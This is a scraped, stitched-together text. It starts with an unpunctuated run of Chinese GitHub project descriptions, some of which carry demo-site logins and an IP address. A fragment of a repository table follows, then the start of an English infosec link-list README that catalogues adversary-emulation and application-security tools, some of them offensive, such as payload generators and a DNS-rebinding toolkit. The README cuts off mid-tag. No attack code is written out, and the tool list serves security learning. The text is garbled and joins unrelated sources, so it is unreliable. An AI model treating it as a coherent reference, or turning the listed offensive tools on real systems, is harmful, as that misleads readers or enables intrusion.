身份证号码验证 数字转人民币 发送短信 发送邮件 加密解密 图片处理 excel导入导出 FTP SFTP fastDFS上传下载 二维码 XML读写 高精度计算 系统配置工具类等等 EduSoho 网络课堂是由杭州阔知网络科技有限公司研发的开源网校系统 EduSoho 包含了在线教学 招生和管理等完整功能 让教育机构可以零门槛建立网校 成功转型在线教育 EduSoho 也可作为企业内训平台 帮助企业实现人才培养 自用的一些乱七八糟 油猴脚本 为刚刚学习php语言以及web网站开发整理的一套资源 有视频 实战代码 学习路径等 会持续更新 This is a goindex theme 一个goindex的扩展主题 NumPy官方中文文档 完整版 搭建移动端开发 基于适配方案 axios封装 构建手机端模板脚手架 后台管理 脚手架接口 从简单开始 PhalApi简称π框架 一个轻量级PHP开源接口框架 专注于接口服务开发 前端特效存档Chrome浏览器 抢购 秒杀插件 秒杀助手 定时自动点击云存储管理客户端 支持七牛云 腾讯云 青云 阿里云 又拍云 亚马逊S3 京东云 仿文件夹管理 图片预览 拖拽上传 文件夹上传 同步 批量导出URL等功能font carrier是一个功能强大的字体操作库 使用它你可以随心所欲的操作字体 让你可以在svg的维度改造字体的展现形状 CRN是Ctrip React Native简称 由携程无线平台研发团队基于React Native框架优化 定制成稳定性和性能更佳 也更适合业务场景的跨平台开发框架 油猴脚本页面浮窗广告完全过滤净化 国服最强最全最新CSDN脚本微信小程序即时通讯模板 使用WebSocket通信小程序反编译 支持分包 “想学吗”个人知识管理与自媒体营销工具 超多经典 Canvas 实例 动态离子背景 炫彩小球 贪吃蛇 坦克大战 是男人就下1 层 心形文字等 Vue UEditor v model双向绑定 HQChart H5 微信小程序 沪深 港股 数字货币 期货 美股 K线图 kline 走势图 缩放 拖拽 十字光标 画图工具 截图 筹码图 分析家语法 通达信语法 麦语法 第3方数据替换接口基于koa2的标准前后端分离框架 一款企业信息化开发基础平台 拟集成OA 办公自动化 CMS 内容管理系统 等企业系统的通用业务功能 JeePlatform项目是一款以SpringBoot为核心框架 集ORM框架Mybatis Web层框架SpringMVC和多种开源组件框架而成的一款通用基础平台 代码已经捐赠给开源中国社区基于inception的自动化SQL操作平台 支持SQL执行 LDAP认证 发邮件 OSC SQL查询 SQL优化建议 权限管理等功能 支持docker镜像是一款专门面向个人 团队和小型组织的私有网盘系统 轻量 开源 完善 无论是在家庭 学校还是在办公室 您都能立刻开始使用它 了解更多请访问官方网站 Node js API 中文文档dubbo服务管理以及监控系统拯救B站的弹幕体验 对抗假消息系列项目之一 截屏 实锤?相信你就输了 ”突破性“更新 支持修改任何网站 ️一个简洁 优雅且高效的 Hugo 主题Vue js 示例项目 简易留言板 本项目拥有完善的文档说明与注释 让您快速上手 Vue js 开发? Vue Validator? Vuex?最佳实践基于 Node js Koa2 实战开发的一套完整的博客项目网站 用 React 编写的基于Taro Dva构建的适配不同端 微信 百度 支付宝小程序 H5 React Native 等 的时装衣橱信息泄漏监控系统 伪装115浏览器干爆前端 一网打尽前端面试 学习路径 优秀好文等各类内容 帮助大家一年内拿到期望的 offer 前端性能监控系统 消息队列 高可用 集群等相关架构SpringBoot v2项目是努力打造springboot框架的极致细腻的脚手架 包括一套漂亮的前台 无其他杂七杂八的功能 原生纯净 中文文本标注工具 最全最新中国 省 市 区县 乡镇街道 json csv sql数据 一款轻巧的渐进式微信小程序框架 全网 1 w 阅读量的进阶前端技术博客仓库 Vue 源码解析 React 深度实践 TypeScript 进阶艺术 工程化 性能优化实践 完整开源 Java快速开发平台 基于Spring SpringMVC Mybatis架构 MStore提供更多好用的插件与模板 文章 商城 微信 论坛 会员 评论 支付 积分 工作流 任务调度等 同时提供上百套免费模板任意选择 价值源自分享 铭飞系统不仅一套简单好用的开源系统 更是一整套优质的开源生态内容体系 铭飞的使命就是降低开发成本提高开发效率 提供全方位的企业级开发解决方案 每月28定期更新版本WeHalo 简约风 的微信小程序版博客 基于 vue2 vuex 构建一个具有 45 个页面的大型单页面应用基于Vue3 Element Plus 的后台管理系统解决方案基于 vue element ui 的后台管理系统鲜亮的高饱和色彩 专注视觉的小程序组件库 ️ 跨平台桌面端视频资源播放器 简洁无广告 免费高颜值 后台管理主线版本基于三者并行开发维护 同时支持电脑 手机 平板 切换分支查看不同的vue版本 element plus版本已发布 vue3 vue3 vue vue3 x vue js 程序无国界 但程序员有国界 中国国家尊严不容挑衅 如果您在特殊时期 mall admin web是一个电商后台管理系统的前端项目 基于Vue Element实现 主要包括商品管理 订单管理 会员管理 促销管理 运营管理 内容管理 统计报表 财务管理 权限管理 设置等功能 一款完善的安全评估工具 支持常见 web 安全问题扫描和自定义 poc 使用之前务必先阅读文档Vue数据可视化组件库 类似阿里DataV 大屏数据展示 提供SVG的边框及装饰 图表 水位图 飞线图等组件 简单易用 长期更新 React版已发布 UI表单设计及代码生成器基于Vue的可视化表单设计器 让表单开发简单而高效 基于vue的高扩展在线网页制作平台 可自定义组件 可添加脚本 可数据统计 vue后台管理框架 精致的下拉刷新和上拉加载 js框架 支持vue 完美运行于移动端和主流PC浏览器 基于vue2 vuex element ui后台管理系统 Vue js高仿饿了么外卖App课程源码 coding imooc com class 74 html京东风格移动端 Vue2 Vue3 组件库eladmin前端源码 项目基于的前后端分离后台管理系统 权限控制采用 RBAC 菜单动态路由资源采集站在线播放uView UI 是uni app生态最优秀的UI框架 全面的组件和便捷的工具会让您信手拈来 如鱼得水Vue2 全家桶仿 微信App 项目 支持多人在线聊天和机器人聊天前端vue 后端koa 全栈式开发bilibili首页 A magical vue admin 记得star互联网大厂内推及大厂面经整理 并且每天一道面试题推送 每天五分钟 半年大厂中 Vue3 全家桶 Vant 搭建大型单页面商城项目 新蜂商城 Vue3 版本 技术栈为基于Vue开发的XMall商城前台页面 PC端 Vue全家桶 Vant 搭建大型单页面电商项目 ddbuy 7 orange cn前后端分离权限管理系统 精力有限 停止维护 用 Vue js 开发的跨三端应用Prototyping Tool For Vue Devs 适用于Vue的原型工具实战商城 基于Vue2 高仿微信App的单页应用electron跨平台音乐播放器 可搜网易云 QQ音乐 虾米音乐 支持QQ 微博 Github登录 云歌单 支持一键导入音乐平台歌单ThorUI组件库 轻量 简洁的移动端组件库 组件文档地址 thorui cn doc 最近更新时间 2 21 5 28uni app框架演示示例 Electron Vue 仿网易云音乐windows客户端 基于 Vue2 Vue CLI3 的高仿网易云 mac 客户端播放器 PC Online Music PlayerGitHub 泄露监控系统pear 梨子 轻量级的在线项目 任务协作系统 远程办公协作自选基金助手是一款Chrome扩展 用来快速获取关注基金的实时数据 查看自选基金的实时估值情况支持 markdown 渲染的博客前台展示Vue 音乐搜索 播放 Demo 一个基于 vue2 vue3 的 大转盘 九宫格 抽奖插件奖品 文字 图片 颜色 按钮均可配置 支持同步 异步抽奖 概率前 后端可控 自动根据 dpr 调整清晰度适配移动端 基于 Vue 的在线音乐播放器 PC Online music player美团饿了吗外卖红包外卖优惠券 先领红包再下单 外卖红包优惠券 cps分成 别人领红包下单 你拿佣金 讨论如何构建一套可靠的大型分布式系统用 vue 写小程序 基于 mpvue 框架重写 weui 基于Vue框架构建的github数据可视化平台使用GitHub API 搭建一个可动态发布文章的博客可视化拖拽组件库 DEMO基于开源组件 Inception SQLAdvisor SOAR 的SQL审核 SQL优化的Web平台显示当前网站的所有可用Tampermonkey脚本 专注Web与算法无缝滚动component精通以太坊 中文版 网页模拟桌面基于的多模块前后端分离的博客项目网易云音乐 QQ音乐 咪咕音乐 第三方 web端 可播放 vip 下架歌曲 基于权限管理的后台管理系统基于 Node js 的开源个人博客系统 采用 Nuxt Vue TypeScript 技术栈 一款简洁高效的VuePress知识管理 博客 blog 主题基于uni app的ui框架基于Vue Vuex iView的电子商城网站 Vue2 全家桶 Vant 搭建大型单页面商城项目 新蜂商城前后端分离版本 前端Vue项目源码酷狗 ️ 极客猿梦导航 独立开发者的导航站 Vue SpringBoot MyBatis 音乐网站基于 RageFrame2 的一款免费开源的基础商城销售功能的开源微商城 基于vue2 的网易云音乐播放器 api来自于NeteaseCloudMusicApi v2 为最新版本编写的一套后台管理系统全栈开发王者荣耀手机端官网和管理后台基于 Vue3 x TypeScript 的在线演示文稿应用 实现PPT幻灯片的在线编辑 演示 基于vue2 生态的后台管理系统模板开发的后台管理系统 Vchat 从头到脚 撸一个社交聊天系统 vue node mongodb h5编辑器类似maka 易企秀 账号 密码 admin996 公司展示 讨论Vue Spring boot前后端分离项目 wh web wh server的升级版 基于element ui的数据驱动表单组件基于 GitHub API 开发的图床神器 图片外链使用 jsDelivr 进行 CDN 加速 免下载 免安装 打开网站即可直接使用 免费 稳定 高效 ️ Vue初 中级项目 CnodeJS社区重构预览 DEMO 基于vue2全家桶实现的 仿移动端QQ基于Vue Echarts 构建的数据可视化平台 酷炫大屏展示模板和组件库 持续更新各行各业实用模板和炫酷小组件 基于Spring Boot的在线考试系统 预览地址 129 211 88 191 账户分别是admin teacher student 密码是admin123 6pan 6盘小白羊 第二版 vue3 antd typescript on bone and knife 基于Vue 全家桶 2 x 制作的美团外卖APP 本项目是一款基于 Avue 的表单设计器 拖拽式操作让你快速构建一个表单 一刻社区前端源码基于Vue iView Admin开发的XBoot前后端分离开放平台前端 权限可控制至按钮显示 动态路由权限菜单 多语言 简洁美观 前后端分离 ️一个开源的社区程序 临时测试站 https t myrpg cnecharts地图geoJson行政边界数据的实时获取与应用 省市区县多级联动下钻 真正意义的下钻至县级 附最新geoJson文件下载 Vue的Nuxt js服务端渲染框架 NodeJS为后端的全栈项目 Docker一键部署 面向小白的完美博客系统vue瀑布流组件 vue waterfall easy 2 x Ego 移动端购物商城 vue vuex ruoter webpack Vue js Node js Mongodb 前后端分离的个人博客头像加口罩小程序 基于uniapp使用vue快速实现 广告月收入4k 基于vue3 的管理端模板教你如何打造舒适 高效 时尚的前端开发环境基于 Flask 和 Vue js 前后端分离的微型博客项目 支持多用户 Markdown文章 喜欢 收藏文章 粉丝关注 用户评论 点赞 动态通知 站内私信 黑名单 邮件支持 管理后台 权限管理 RQ任务队列 Elasticsearch全文搜索 Linux VPS部署 Docker容器部署等基于 vue 和 heyui 组件库的中后端系统 admin heyui topVue 轻量级后台管理系统基础模板uni app项目插件功能集合We川大小程序 scuplus 使用wepy开发的完善的校园综合小程序 4 页面 前后端开源 包括成绩 课表 失物招领 图书馆 新闻资讯等等常见校园场景功能一个全随机的刷装备小游戏一个vue全家桶入门Demo 是一個可以幫助您 Vue js 的項目測試及偵錯的工具 也同時支持 Vuex及 Vue Router 微信公众号管理系统 包含公众号菜单管理 自动回复 素材管理 模板消息 粉丝管理 ️等功能 前后端都开源免费 基于vue 的管理后台 配合Blog Core与Blog Vue等多个项目使用海风小店 开源商城 微信小程序商城管理后台 后台管理 VUE IT之家第三方小程序版客户端 使用 mpvue 开发 兼容 web vue 可以拖拽排序的树形表格 现代 Web 开发语法基础与工程实践 涵盖 Web 开发基础 前端工程化 应用架构 性能与体验优化 混合开发 React 实践 Vue 实践 WebAssembly 等多方面 数据大屏可视化编辑器一个适用于摄影从业者 爱好者 设计师等创意行业从业者的图像工具箱 武汉大学图书馆助手 桌面端基于form generator 仿钉钉审批流程创建 表单创建 流程节点可视化配置 必填条件及校验 一个完整electron桌面记账程序 技术栈主要使用electron vue vuetify 开机自动启动 自动更新 托盘最小化 闪烁等常用功能 Nsis制作漂亮的安装包 程序猿的婚礼邀请函 一个基于vue和element ui的树形穿梭框及邮件通讯录版本见示例见 基于Gin Vue Element UI的前后端分离权限管理系统的前端模块通用书籍阅读APP BookChat 的 uni app 实现版本 支持多端分发 编译生成Android和iOS 手机APP以及各平台的小程序基于Vue3的Material design风格移动端组件库进阶资深前端开发在线考试系统 springboot vue前后端分离的一个项目 ️ 无后端的仿 YouTube Live Chat 风格的简易 Bilibili 弹幕姬vue后端管理系统界面 基于ui组件iviewBilibili直播弹幕库 for Mac Windows LinuxVue高仿网易云音乐 基本实现网易云所有音乐 MV相关功能 现已更新到第二版 仅用于学习 下面有详细教程 武汉大学图书馆助手 移动端Zeus基于Golang Gin casbin 致力于做企业统一权限 账号中心管理系统 包含账号管理 数据权限 功能权限 应用管理 多数据库适配 可docker 一键运行 社区活跃 版本迭代快 加群免费技术支持 Vue高仿网易云音乐 Vue入门实践 在线预览 暂时停止基于 Vue 和 ElementUI 构建的一个企业级后台管理系统 ️ 跨平台移动端视频资源播放器 简洁免费 ZY Player 移动端 APP 基于 Uni app 开发 Vue实战项目基于参考小米商城 实现的电商项目 h5制作 移动端专题活动页面可视化编辑仿钉钉审批流程设置动态表单页面设计 自动生成页面微前端项目实战vue项目 基于vue3 qiankun2 进阶版 github com wl ui wl mfe基于 d2 admin的RBAC权限管理解决方案VueNode 是一套基于的前后端分离项目 基于仿京东淘宝的 移动端H5电商平台 巨树 基于ztree封装的Vue树形组件 轻松实现海量数据的高性能渲染 微信红包封面领取 用户观看视频广告或者邀请用户可获取微信红包序列号基于 Vue 的可视化布局编辑器插件kbone ui 是一套能同时支持 小程序 kbone 和 vue 框架开发的多端 UI 库 PS 新版 kbone ui 已出炉并迁移到 kbone 主仓库 此仓库仅做旧版维护之用 一个vue的个人博客项目 配合 net core api教程 打造前后端分离Tumo Blog For Vue js 前后端分离bpmn js流程设计器组件 基于vue elementui美化属性面板 满足9 %以上的业务需求专门为 Weex 前端开发者打造的一套高质量UI框架 想用vue把我现在的个人网站重新写一下 新的风格 新的技术 什么都是新的 本项目是一个在线聊天系统 最大程度的还原了Mac客户端QQ vue cli3 后台管理模板 heart 基于vue2和vuex的复杂单页面应用 2 页面53个API 仿实验楼 基于 Vue Koa 的 WebDesktop 视窗系统 Jeebase是一款前后端分离的开源开发框架 基于开发 一套SpringBoot后台 两套前端页面 可以自由选择基于ElementUI或者AntDesign的前端界面 二期会整合react前端框架 Ant Design React 在实际应用中已经使用这套框架开发了CMS网站系统 社区论坛系统 微信小程序 微信服务号等 后面会逐步整理开源 本项目主要目的在于整合主流技术框架 寻找应用最佳项目实践方案 实现可直接使用的快速开发框架 使用 vue cli3 搭建的vue vuex router element 开发模版 集成常用组件 功能模块JEECG BOOT APP 移动解决方案 采用uniapp框架 一份代码多终端适配 同时支持APP 小程序 H5 实现了与JeecgBoot平台完美对接的移动解决方案 目前已经实现登录 用户信息 通讯录 公告 移动首页 九宫格等基础功能 明日方舟工具箱 支持中台美日韩服vue的验证码插件这里有一些标准组件库可能没有的功能组件 已有组件 放大镜 签到 图片标签 滑动验证 倒计时 水印 拖拽 大家来找茬 基于Vue2 Nodejs MySQL的博客 有后台管理系统 支持 登陆 注册 留言 评论 回复 点赞长江证券郑州大学超市管理系统天安门坦克桌面行驶工况茶马古道金融文本情感 | https://github.com/cirosantilli/china-dictatorhsip-2 | 31 | 18| | 20220427T12:18:05Z | Null | https://github.com/SusanOsasona/fuzzy-guide | 0 | 0| | 20220427T11:52:58Z | Null | https://github.com/Tanuka-Mondal/Fuzzy | 0 | 0| | 20220427T11:52:52Z | Code samples for learning fuzzing in Go | https://github.com/jjngx/fuzzing | 0 | 0| | 20220427T11:29:54Z | Rstudio integration demonstration | https://github.com/laurajanegraham/fuzzy-octo-robot | 0 | 0| # 日更新程序
# Cybersecurity Infosec > Welcome to the World of Infosec in Cybersecurity. An ongoing open collection infosec useful links, courses, learning tutorials, libaries, and training resources. [Information Security](https://en.wikipedia.org/wiki/Information_security), sometimes shortened to InfoSec, is the practice of protecting information by mitigating information risks. It is part of information risk management. ![infosec](https://github.com/paulveillard/cybersecurity-infosec/blob/main/Infosec.png) #### `What is the difference between cybersecurity and information security?` > Information security and cybersecurity are often confused. [InfoSec](https://www.cisco.com/c/en/us/products/security/what-is-information-security-infosec.html) is a crucial part of cybersecurity, but it refers exclusively to the processes designed for data security. Cybersecurity is a more general term that includes InfoSec. ## `Table of Contents` - [Adversary Simulation & Emulation](#adversary-simulation--emulation) - [Application Security](#application-security) - [Binary Analysis](#binary-analysis) - [Cloud Security](#cloud-security) - [Courses](#courses) - [Cryptography](#cryptography) - [Data Sets](#data-sets) - [Digital Forensics and Incident Response](#digital-forensics-and-incident-response) - [Exploits](#exploits) - [Hardening](#hardening) - [Hardware](#hardware) - [Malware Analysis](#malware-analysis) - [Mobile Security](#mobile-security) - [Network Security](#network-security) - [Open-source Intelligence (OSINT)](#open-source-intelligence-osint) - [Password Cracking and Wordlists](#password-cracking-and-wordlists) - [Social Engineering](#social-engineering) - [Smart Contract](#smart-contract) - [Vulnerable](#vulnerable) - [Other Courses](#other-courses) - [Massive Online Open Courses](#massive-online-open-courses) - [Academic Courses](#academic-courses) - [Laboratories](#laboratories) - [Capture the Flag](#capture-the-flag) - [Open Security Books](#open-security-books) - [Challenges](#challenges) - [Documentation](#documentation) - [Types of Infosec](#types-of-infosec) - [SecurityTube Playlists](#securitytube-playlists) - [License](#license) **[`^ back to top ^`](#)** ## Adversary Simulation & Emulation <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/activeshadow/go-atomicredteam">activeshadow/go-atomicredteam</a></td> <td>go-atomicredteam is a Golang application to execute tests as defined in the atomics folder of Red Canary's Atomic Red Team project</td> </tr> <tr> <td><a href="https://github.com/alphasoc/flightsim">alphasoc/flightsim</a></td> <td>A utility to generate malicious network traffic and evaluate controls</td> </tr> <tr> <td><a href="https://docs.microsoft.com/en-us/office365/securitycompliance/attack-simulator">Attack Simulatorin Office 365</a></td> <td>Simulate realistic attacks on Office 365 environment</td> </tr> <tr> <td><a href="https://github.com/Azure/Cloud-Katana">Azure/Cloud-Katana</a></td> <td>Unlocking Serverless Computing to Assess Security Controls</td> </tr> <tr> <td><a href="https://github.com/blackbotinc/Atomic-Red-Team-Intelligence-C2">blackbotinc/Atomic-Red-Team-Intelligence-C2</a></td> <td>ARTi-C2 is a post-exploitation framework used to execute Atomic Red Team test cases with rapid payload deployment and execution capabilities via .NET's DLR.</td> </tr> <tr> <td><a href="https://www.encripto.no/en/downloads-2/tools/">Blue Team Training Toolkit</a></td> <td>Blue Team Training Toolkit (BT3) is designed for network analysis training sessions, incident response drills and red team engagements</td> </tr> <tr> <td><a href="https://github.com/center-for-threat-informed-defense/adversary_emulation_library">center-for-threat-informed-defense/adversary_emulation_library</a></td> <td>An open library of adversary emulation plans designed to empower organizations to test their defenses based on real-world TTPs.</td> </tr> <tr> <td><a href="https://github.com/Coalfire-Research/Red-Baron">Coalfire-Research/Red-Baron</a></td> <td>Automate creating resilient, disposable, secure and agile infrastructure for Red Teams</td> </tr> <tr> <td><a href="https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI">Cyb3rWard0g/Invoke-ATTACKAPI</a></td> <td>A PowerShell script to interact with the MITRE ATT&CK Framework via its own API</td> </tr> <tr> <td><a href="https://github.com/Cyb3rWard0g/mordor">Cyb3rWard0g/mordor</a></td> <td>Re-play Adversarial Techniques</td> </tr> <tr> <td><a href="https://github.com/chryzsh/DarthSidious/">chryzsh/DarthSidious</a></td> <td>Building an Active Directory domain and hacking it</td> </tr> <tr> <td><a href="https://github.com/d3vzer0/reternal-quickstart">d3vzer0/reternal-quickstart</a></td> <td>Repo containing docker-compose files and setup scripts without having to clone the individual reternal components</td> </tr> <tr> <td><a href="https://github.com/ElevenPaths/ATTPwn">ElevenPaths/ATTPwn</a></td> <td>ATTPwn is a computer security tool designed to emulate adversaries.</td> </tr> <tr> <td><a href="https://github.com/endgameinc/RTA">endgameinc/RTA</a></td> <td>RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK</td> </tr> <tr> <td><a href="https://github.com/fozavci/tehsat">fozavci/tehsat</a></td> <td>Tehsat Malware Traffic Generator</td> </tr> <tr> <td><a href="https://github.com/FSecureLABS/leonidas">FSecureLABS/leonidas</a></td> <td>Automated Attack Simulation in the Cloud, complete with detection use cases.</td> </tr> <tr> <td><a href="https://github.com/jymcheong/AutoTTP">jymchoeng/AutoTTP</a></td> <td>Automated Tactics Techniques & Procedures</td> </tr> <tr> <td><a href="https://github.com/lawrenceamer/0xsp-Mongoose">lawrenceamer/0xsp-Mongoose</a></td> <td>a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks, replicate the tactics and techniques of an advanced adversary in a network.</td> </tr> <tr> <td><a href="https://github.com/microsoft/restler-fuzzer">microsoft/restler-fuzzer</a></td> <td>RESTler is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services.</td> </tr> <tr> <td><a href="https://github.com/MiladMSFT/ThreatHunt">MiladMSFT/ThreatHunt</a></td> <td>ThreatHunt is a PowerShell repository that allows you to train your threat hunting skills.</td> </tr> <tr> <td><a href="https://github.com/mitre/caldera">mitre/caldera</a></td> <td>An automated adversary emulation system</td> </tr> <tr> <td><a href="https://github.com/mvelazc0/PurpleSharp">mvelazc0/PurpleSharp</a></td> <td>PurpleSharp is a C# adversary simulation tool that executes adversary techniques with the purpose of generating attack telemetry in monitored Windows environments</td> </tr> <tr> <td><a href="https://github.com/NextronSystems/APTSimulator">NextronSystems/APTSimulator</a></td> <td>A toolset to make a system look as if it was the victim of an APT attack</td> </tr> <tr> <td><a href="https://github.com/n0dec/MalwLess">n0dec/MalwLess</a></td> <td>Test blue team detections without running any attack</td> </tr> <tr> <td><a href="https://github.com/OTRF/Microsoft-Sentinel2Go">OTRF/Microsoft-Sentinel2Go</a></td> <td>Microsoft Sentinel2Go is an open source project developed to expedite the deployment of a Microsoft Sentinel research lab.</td> </tr> <tr> <td><a href="https://github.com/OTRF/SimuLand">OTRF/SimuLand</a></td> <td>Cloud Templates and scripts to deploy mordor environments</a></td> </tr> <tr> <td><a href="https://github.com/praetorian-code/purple-team-attack-automation">praetorian-code/purple-team-attack-automation</a></td> <td>Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs</td> </tr> <tr> <td><a href="https://github.com/qsecure-labs/overlord">qsecure-labs/overlord</a></td> <td>Overlord - Red Teaming Infrastructure Automation</td> </tr> <tr> <td><a href="https://github.com/ReconInfoSec/adversary-emulation-map">ReconInfoSec/adversary-emulation-map</a></td> <td>Creates an ATT&CK Navigator map of an Adversary Emulation Plan</td> </tr> <tr> <td><a href="https://github.com/redcanaryco/atomic-red-team">redcanaryco/atomic-red-team</a></td> <td>Small and highly portable detection tests based on MITRE's ATT&CK.</td> </tr> <tr> <td><a href="https://github.com/redcanaryco/AtomicTestHarnesses">redcanaryco/AtomicTestHarnesses</a></td> <td>Public Repo for Atomic Test Harness</td> </tr> <tr> <td><a href="https://github.com/redcanaryco/chain-reactor">redcanaryco/chain-reactor</a></td> <td>Chain Reactor is an open source framework for composing executables that simulate adversary behaviors and techniques on Linux endpoints.</td> </tr> <tr> <td><a href="https://github.com/redhuntlabs/RedHunt-OS">redhuntlabs/RedHunt-OS</a></td> <td>Virtual Machine for Adversary Emulation and Threat Hunting</td> </tr> <tr> <td><a href="https://github.com/scythe-io/community-threats">scythe-io/community-threats</a></td> <td>The GitHub of Adversary Emulation Plans in JSON. Share SCYTHE threats with the community. #ThreatThursday adversary emulation plans are shared here.</td> </tr> <tr> <td><a href="https://github.com/SecurityRiskAdvisors/VECTR">SecurityRiskAdvisors/VECTR</a></td> <td>VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios</td> </tr> <tr> <td><a href="https://github.com/SpiderLabs/sheepl">SpiderLabs/sheepl</a></td> <td>Sheepl : Creating realistic user behaviour for supporting tradecraft development within lab environments</td> </tr> <tr> <td><a href="https://github.com/splunk/attack_range">splunk/attack_range</a></td> <td>A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk</td> </tr> <tr> <td><a href="https://github.com/swimlane/soc-faker">swimlane/soc-faker</a></td> <td>A python package for use in generating fake data for SOC and security automation.</td> </tr> <tr> <td><a href="https://github.com/TryCatchHCF/DumpsterFire">TryCatchHCF/DumpsterFire</a></td> <td>"Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events.</td> </tr> <tr> <td><a href="https://github.com/uber-common/metta">uber-common/metta</a></td> <td>An information security preparedness tool to do adversarial simulation.</td> </tr> <tr> <td><a href="https://mitre.github.io/unfetter/">Unfetter</a></td> <td>Unfetter is a project designed to help network defenders, cyber security professionals, and decision makers identify and analyze defensive gaps in a more scalable and repeatable way</td> </tr> <tr> <td><a href="https://github.com/securityriskadvisors/vectr">securityriskadvisors/vectr</a></td> <td>VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios</td> </tr> </table> ## Application Security <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/aboul3la/Sublist3r">aboul3la/Sublist3r</a></td> <td>Fast subdomains enumeration tool for penetration testers</td> </tr> <tr> <td><a href="https://github.com/Acheron-VAF/Acheron">Acheron-VAF/Acheron</a></td> <td>Acheron is a RESTful vulnerability assessment and management framework built around search and dedicated to terminal extensibility.</td> </tr> <tr> <td><a href="https://github.com/ambionics/phpggc">ambionics/phpggc</a></td> <td>PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.</td> </tr> <tr> <td><a href="https://github.com/anchore/grype">anchore/grype</a></td> <td>A vulnerability scanner for container images and filesystems</td> </tr> <tr> <td><a href="https://github.com/appsecco/spaces-finder">appsecco/spaces-finder</a></td> <td>A tool to hunt for publicly accessible DigitalOcean Spaces</td> </tr> <tr> <td><a href="https://github.com/anantshri/svn-extractor">anatshri/svn-extractor</a></td> <td>Simple script to extract all web resources by means of .SVN folder exposed over network.</td> </tr> <tr> <td><a href="https://github.com/aquasecurity/kube-hunter">aquasecurity/kube-hunter</a></td> <td>Hunt for security weaknesses in Kubernetes clusters</td> </tr> <tr> <td><a href="https://github.com/aquasecurity/trivy">aquasecurity/trivy</a></td> <td>A Simple and Comprehensive Vulnerability Scanner for Container Images, Git Repositories and Filesystems. Suitable for CI</td> </tr> <tr> <td><a href="https://github.com/ARPSyndicate/kenzer">ARPSyndicate/kenzer</a></td> <td>automated web assets enumeration & scanning</td> </tr> <tr> <td><a href="https://github.com/barrracud4/image-upload-exploits">barrracud4/image-upload-exploits</a></td> <td>This repository contains various media files for known attacks on web applications processing media files. Useful for penetration tests and bug bounty.</td> </tr> <tr> <td><a href="https://github.com/BishopFox/GitGot">BishopFox/GitGot</a></td> <td>Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.</td> </tr> <tr> <td><a href="https://github.com/BishopFox/h2csmuggler">BishopFox/h2csmuggler</a></td> <td>HTTP Request Smuggling over HTTP/2 Cleartext (h2c)</td> </tr> <tr> <td><a href="https://github.com/brannondorsey/dns-rebind-toolkit">brannondorsey/dns-rebind-toolkit</a></td> <td>A front-end JavaScript toolkit for creating DNS rebinding attacks.</td> </tr> <tr> <td><a href="https://github.com/bridgecrewio/checkov">bridgecrewio/checkov</a></td> <td>Prevent cloud misconfigurations during build-time for Terraform, Cloudformation, Kubernetes, Serverless framework and other infrastructure-as-code-languages with Checkov by Bridgecrew.</td> </tr> <tr> <td><a href="https://github.com/brompwnie/botb">brompwnie/botb</a></td> <td>A container analysis and exploitation tool for pentesters and engineers.</td> </tr> <tr> <td><a href="https://bugbountyrecon.com/">Bug Bounty Recon</a></td> <td>Bug Bounty Recon (bbrecon) is a Recon-as-a-Service for bug bounty hunters and security researchers. The API aims to provide a continuously up-to-date map of the Internet "safe harbor" attack surface, excluding out-of-scope targets.</td> </tr> <tr> <td><a href="https://github.com/Checkmarx/kics">Checkmarx/kics</a></td> <td>Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with KICS by Checkmarx.</td> </tr> <tr> <td><a href="https://github.com/chvancooten/BugBountyScanner">chvancooten/BugBountyScanner</a></td> <td>A Bash script and Docker image for Bug Bounty reconnaissance. Intended for headless use.</td> </tr> <tr> <td><a href="https://github.com/danmar/cppcheck">danmar/cppcheck</a></td> <td>static analysis of C/C++ code</td> </tr> <tr> <td><a href="https://github.com/deepfence/SecretScanner">deepfence/SecretScanner</a></td> <td>Find secrets and passwords in container images and file systems</td> </tr> <tr> <td><a href="https://github.com/deepfence/ThreatMapper">deepfence/ThreatMapper</a></td> <td>Identify vulnerabilities in running containers, images, hosts and repositories</td> </tr> <tr> <td><a href="https://github.com/DefectDojo/django-DefectDojo">DefectDojo/django-DefectDojo</a></td> <td>DefectDojo is an open-source application vulnerability correlation and security orchestration tool.</td> </tr> <tr> <td><a href="https://github.com/doyensec/inql">doyensec/inql</a></td> <td>InQL - A Burp Extension for GraphQL Security Testing</td> </tr> <tr> <td><a href="https://github.com/dstotijn/hetty">dstotijn/hetty</a></td> <td>Hetty is an HTTP toolkit for security research. It aims to become an open source alternative to commercial software like Burp Suite Pro, with powerful features tailored to the needs of the infosec and bug bounty community.</td> </tr> <tr> <td><a href="https://github.com/EmYiQing/Gososerial">EmYiQing/Gososerial</a></td> <td>Dynamically Generates Ysoserial's Payload by Golang</td> </tr> <tr> <td><a href="https://github.com/facebook/pyre-check/">facebook/pyre-check/</a></td> <td>Performant type-checking for python.</td> </tr> <tr> <td><a href="https://github.com/Findomain/Findomain">Findomain/Findomain</a></td> <td>The fastest and cross-platform subdomain enumerator, do not waste your time.</td> </tr> <tr> <td><a href="https://github.com/fkie-cad/cwe_checker">fkie-cad/cwe_checker</a></td> <td>cwe_checker finds vulnerable patterns in binary executables</td> </tr> <tr> <td><a href="https://github.com/google/atheris">google/atheris</a></td> <td>Atheris is a coverage-guided Python fuzzing engine. It supports fuzzing of Python code, but also native extensions written for CPython. Atheris is based off of libFuzzer. When fuzzing native code, Atheris can be used in combination with Address Sanitizer or Undefined Behavior Sanitizer to catch extra bugs.</td> </tr> <tr> <td><a 